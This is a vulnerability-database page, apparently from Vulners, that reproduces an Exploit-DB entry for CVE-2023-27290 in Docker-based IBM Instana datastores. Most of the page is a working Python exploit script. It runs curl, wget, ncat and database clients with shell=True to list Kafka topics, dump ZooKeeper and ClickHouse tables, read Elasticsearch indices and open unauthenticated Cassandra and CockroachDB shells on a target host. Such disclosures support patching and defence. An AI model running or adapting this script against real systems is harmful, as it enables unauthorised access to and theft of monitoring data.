Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Docker based datastores for IBM Instana 241-2 243-0 - No Authentication

🗓️ 07 Apr 2023 00:00:00Reported by Shahid Parvez (zippon)Type 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 193 Views

Docker based datastores for IBM Instana 241-2 243-0 - No Authenticatio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Docker based datastores for IBM Instana 241-2 243-0 - No Authentication Exploit
7 Apr 202300:00
zdt
IBM Security Bulletins		Security Bulletin: Docker based datastores for IBM Instana do not currently require authentication
26 Apr 202316:24
ibm
Circl		CVE-2023-27290
4 Mar 202302:35
circl
CNNVD		IBM Observability with Instana 访问控制错误漏洞
3 Mar 202300:00
cnnvd
CNVD		IBM Observability with Instana Access Control Error Vulnerability
7 Mar 202300:00
cnvd
CVE		CVE-2023-27290
3 Mar 202322:36
cve
Cvelist		CVE-2023-27290 IBM Observability with Instana missing authentication
3 Mar 202322:36
cvelist
EUVD		EUVD-2023-31068
3 Oct 202520:07
euvd
NVD		CVE-2023-27290
3 Mar 202323:15
nvd
Packet Storm		IBM Instana 243-0 Missing Authentication
10 Apr 202300:00
packetstorm
Rows per page
# Exploit Title: Docker based datastores for IBM Instana 241-2 243-0 - No Authentication 
# Google Dork: [if applicable]
# Date: 06 March 2023
# Exploit Author: Shahid Parvez (zippon)
# Vendor Homepage: https://www.instana.com/trial/ *and* https://www.ibm.com/docs/en/instana-observability
# Software Link: https://www.ibm.com/docs/en/instana-observability/current?topic=premises-operations-docker-based-instana
# Version: [Vulnerable version : 239-0 to 239-2 241-0 to 241-2 243-0] (REQUIRED Version : 241-3)
# Tested on: [Mac os]
# CVE : CVE-2023-27290
import argparse
import subprocess
import pexpect

# Define the available options and their corresponding commands
COMMANDS = {
    "kafka": "kafka-topics --bootstrap-server {host}:{port} --list --exclude-internal",
    "cassandra": "/bin/bash -c 'cqlsh {host} {port} && exit'",
    "clickhouse": 'curl --insecure "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"',
    "cockroach": "cockroach sql --host {host}:{port} --insecure",
    "zookeeper": "echo dump |ncat {host} {port}",
    "node-export": "curl http://{host}:{port}",
    "elasticsearch": "curl http://{host}:{port}/_cat/indices?v",
    "prometheus": "curl http://{host}:{port}/metrics",
    "clickhouse": 'wget -O system_tables.csv "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"'
}

# Define the parser for command-line arguments
parser = argparse.ArgumentParser(description="Script to run various commands on a host.")
parser.add_argument("host", help="The host IP address")
parser.add_argument("option", choices=COMMANDS.keys(), help="Select an option")
parser.add_argument("--port", type=int, default=None, help="The port number (default: use default port for the selected option)")
parser.add_argument("--output", help="Output the result to a file")
parser.add_argument("--verbose", action="store_true", help="Print the command line that was executed")

# Parse the command-line arguments
args = parser.parse_args()

# Determine the port number to use
if args.port is None:
    if args.option == "cassandra":
        port = "9042"
    elif args.option == "clickhouse":
        port = "8123"
    elif args.option == "cockroach":
        port = "26257"
    elif args.option == "elasticsearch":
        port = "9200"
    elif args.option == "kafka":
        port = "9092"
    elif args.option == "node-export":
        port = "8181"
    elif args.option == "prometheus":
        port = "9090"
    elif args.option == "zookeeper":
        port = "2181"
else:
    port = str(args.port)

# Build the command to execute
command = COMMANDS[args.option].format(host=args.host, port=port)

# Print the command line if verbose option is provided
if args.verbose:
    print(f"Executing command: {command}")

# If cassandra or cockroach option is selected, use pexpect to communicate inside the interactive shell
if args.option == "cassandra":
    child = pexpect.spawn(command)
    child.expect("Connected to.*", timeout=10)
    child.interact()
    output = child.before
elif args.option == "cockroach":
    child = pexpect.spawn(command)
    child.expect("root@.*:", timeout=10)
    child.interact()
    output = child.before
# If any other option is selected, execute the command and capture the output
else:
    output = subprocess.check_output(command, shell=True)

# If an output file is provided, write the output to the file
if args.output:
    with open(args.output, "wb") as f:
        f.write(output)

# Print the output to the console
print(output.decode())

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Apr 2023 00:00Current
9.4High risk
Vulners AI Score9.4
CVSS 3.19.1
EPSS0.08502
SSVC
exploitdockeribm instanano authenticationcve-2023-27290datastoresdata security
193